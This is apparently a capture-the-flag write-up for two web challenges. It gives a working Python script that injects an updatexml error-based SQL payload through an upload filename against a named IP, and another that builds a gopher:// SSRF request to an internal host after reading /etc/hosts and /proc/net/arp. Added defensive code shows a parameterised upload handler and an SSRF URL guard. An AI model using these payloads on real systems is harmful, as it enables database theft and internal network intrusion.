upload
updatexml error-based injection

```python
import requests

url = "http://124.222.24.150:8001/index.php"
# The injection point is the uploaded file's name: the quote closes the string
# literal and updatexml() reports the subquery result inside its error message.
sql = "1' and updatexml(0x7e,concat(0x7e,(select flag from flag)),0x7e)or'"
# updatexml() only shows a limited number of characters, so read the rest with substr():
# sql = "1' and updatexml(0x7e,concat(0x7e,(select substr(flag,20,20) from flag)),0x7e)or'"
file = {
    # (filename, file content, content type)
    "upfile": ("2." + sql, "<php>", "ctf")
}
req = requests.post(url, files=file)
print(req.text)
```
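As an added illustration from the defender's side (not code from this writeup or from the challenge), here is a hypothetical upload handler in the two forms that matter for the request above: one that splices the uploaded filename into the SQL text and echoes the raw database error back to the client, and a hardened one that binds the filename as a parameter and returns only a generic message. It uses an in-memory SQLite database as a stand-in; SQLite has no updatexml(), so the error text differs from MySQL's, but the point is that the unsafe form hands the filename to the SQL parser at all, while the safe form stores it verbatim. The table names, the sample flag and the function names are assumptions made for this example.

```python
import sqlite3

# Constructed sample filename carrying the same shape of payload as the
# upload request above (updatexml() itself is a MySQL function).
HOSTILE_NAME = "2.1' and updatexml(0x7e,concat(0x7e,(select flag from flag)),0x7e)or'"


def new_db():
    """In-memory stand-in for the challenge database (constructed for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE uploads (id INTEGER PRIMARY KEY, filename TEXT)")
    conn.execute("CREATE TABLE flag (flag TEXT)")
    conn.execute("INSERT INTO flag VALUES ('flag{constructed_sample}')")
    return conn


def record_upload_unsafe(conn, filename):
    """Hypothetical vulnerable handler: the filename is pasted into the SQL text,
    so a quote in it ends the string literal and the remainder is parsed as SQL.
    The raw database error is returned to the client, which is exactly the
    channel an error-based injection reads data from."""
    try:
        conn.execute("INSERT INTO uploads (filename) VALUES ('%s')" % filename)
        return "ok"
    except sqlite3.Error as exc:
        return "db error: %s" % exc


def record_upload_safe(conn, filename):
    """Hardened handler: a bound parameter keeps the filename as data, and the
    client only ever sees a generic message instead of the database error."""
    try:
        conn.execute("INSERT INTO uploads (filename) VALUES (?)", (filename,))
        return "ok"
    except sqlite3.Error:
        return "upload failed"


def stored_filenames(conn):
    """Return every filename currently recorded, in insertion order."""
    return [row[0] for row in conn.execute("SELECT filename FROM uploads ORDER BY id")]


if __name__ == "__main__":
    db = new_db()
    print(record_upload_unsafe(db, HOSTILE_NAME))   # database error reaches the client
    print(record_upload_safe(db, HOSTILE_NAME))     # "ok": the name is stored as data
    print(stored_filenames(db))
```

With the hostile name, the unsafe handler never inserts a row and leaks the engine's error text; the safe handler stores the whole string, quote and all, as an ordinary value. Parameter binding is the fix; escaping the filename or filtering keywords such as `updatexml` is not, because the filename still reaches the parser as SQL.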
signin
First read /etc/hosts to find the internal network address.
To see which IPs exist on that subnet, check /proc/net/arp, or simply enumerate the range.
The hint tells us to first GET a parameter a; following the hints one by one we can build the request and pass the parameters through the gopher protocol.
(When sending a POST through gopher, newlines must be replaced with %0d%0a; if there are multiple parameters, the & between them must also be URL-encoded.)
```python
import urllib.parse

# The inner HTTP request that the SSRF endpoint will forward to 127.0.0.1
# (GET parameter a from the hint, POST parameter b in the body).
payload = """POST /index.php?a=1 HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Referer: bolean.club
Content-Length: 3

b=1
"""
# The empty line separates the headers from the body, and the request must end
# with a newline: the trailing line break marks the end of the HTTP request.
tmp = urllib.parse.quote(payload)
# gopher needs CRLF line endings, so turn every encoded LF into CRLF.
new = tmp.replace('%0A', '%0D%0A')
result = 'gopher://172.73.23.100:80/' + '_' + new
# The gopher URL is itself passed in a GET parameter, so URL-encode it a second time.
result = urllib.parse.quote(result)
print(result)
```
This gives the flag.
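As an added example from the defender's side (not part of this writeup), the following URL guard is the kind of check that stops the gopher request above from being forwarded: it allows only http and https, rejects URLs carrying userinfo, resolves the host, and rejects loopback, private, link-local and other non-public addresses on every resolved IP. Because the challenge's internal address 172.73.23.100 lies outside RFC 1918 space, which `ipaddress` alone treats as public, the guard also takes an operator-supplied denylist of CIDR ranges. The function names, the denylist and the sample URLs are assumptions made for this example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Only plain web schemes may be fetched; gopher://, file://, dict:// etc. are refused.
ALLOWED_SCHEMES = {"http", "https"}


def _resolve(host):
    """Return every IP address the host maps to (an IP literal needs no DNS lookup)."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        pass
    infos = socket.getaddrinfo(host, None)
    return [ipaddress.ip_address(info[4][0]) for info in infos]


def _is_non_public(ip):
    """True for loopback, RFC 1918, link-local, multicast, reserved and unspecified addresses."""
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_fetch_url(url, extra_denied=()):
    """Decide whether a user-supplied URL may be fetched server-side.

    Returns (ok, reason). extra_denied is a list of CIDR strings for internal
    ranges that are not caught by the standard non-public checks (assumed to be
    maintained by the operator, e.g. a container network on public-looking space).
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "userinfo in URL"
    denied = [ipaddress.ip_network(n, strict=False) for n in extra_denied]
    try:
        addrs = _resolve(parts.hostname)
    except (socket.gaierror, ValueError):
        return False, "unresolvable host"
    for ip in addrs:
        if _is_non_public(ip):
            return False, "resolves to non-public address %s" % ip
        if any(ip in net for net in denied):
            return False, "resolves to denied range %s" % ip
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample URLs, including the shape of the request built above.
    samples = [
        "gopher://172.73.23.100:80/_POST%20/index.php",
        "http://127.0.0.1/index.php?a=1",
        "http://172.73.23.100/",
    ]
    for u in samples:
        print(u, "->", check_fetch_url(u, extra_denied=["172.73.0.0/16"]))
```

Two caveats a practitioner should keep in mind: the check above is a pre-flight decision, so the HTTP client must connect to the address that was checked (otherwise a DNS answer that changes between the check and the connection bypasses it), and every redirect target needs the same check again.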